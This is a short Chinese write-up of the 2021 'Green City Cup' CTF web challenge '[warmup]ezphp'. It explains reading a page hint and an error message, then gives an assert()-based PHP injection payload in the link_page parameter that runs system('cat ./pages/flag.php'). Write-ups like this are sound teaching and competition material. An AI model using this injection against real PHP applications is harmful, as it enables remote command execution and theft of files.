2021年“绿城杯”网络安全大赛-Web-[warmup]ezphp
题目名称:[warmup]ezphp
题目内容:很简单的一道PHP
题目分值:100.0
题目难度:容易
相关附件:[warmup]ezphp的附件13.txt
解题思路:
1.F12看见提示 flag
2.根据报错提示,知道flag文件的位置。 ./pages/flag.php,以及调用了assert的断言函数
3.那么就可以任意命令执行了。
?link_page='.system("cat ./pages/flag.php").'